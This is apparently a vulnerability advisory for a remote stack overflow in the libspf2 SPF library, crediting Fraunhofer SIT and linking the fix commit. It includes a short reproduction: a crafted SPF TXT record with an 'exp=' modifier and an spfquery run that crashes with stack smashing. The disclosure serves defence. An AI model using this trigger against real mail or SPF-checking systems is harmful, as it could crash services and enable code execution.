#### Description
#### Attack type
Remote
#### Impact
(x) Code Execution (x) Denial of Service
#### Attack vector(s):
#### Patch
The issue has been fixed in github commit c37b7c1:
https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef
#### Discoverer(s)/Credits
Philipp Jeitner and Haya Shulman, Fraunhofer SIT
philipp.jeitner () sit fraunhofer de
haya.shulman () sit fraunhofer de
#### Reference(s)
- libspf2: https://www.libspf2.org/, https://github.com/shevek/libspf2
#### Details and information to reproduce the vulnerability
To reproduce, set the SPF record of a domain you control like listed below:
example.com. 300 IN TXT "v=spf1 exp=exp.example.com"
# spfquery --sender someone () example com -ip 1.2.3.4
*** stack smashing detected ***: terminated
Aborted (core dumped)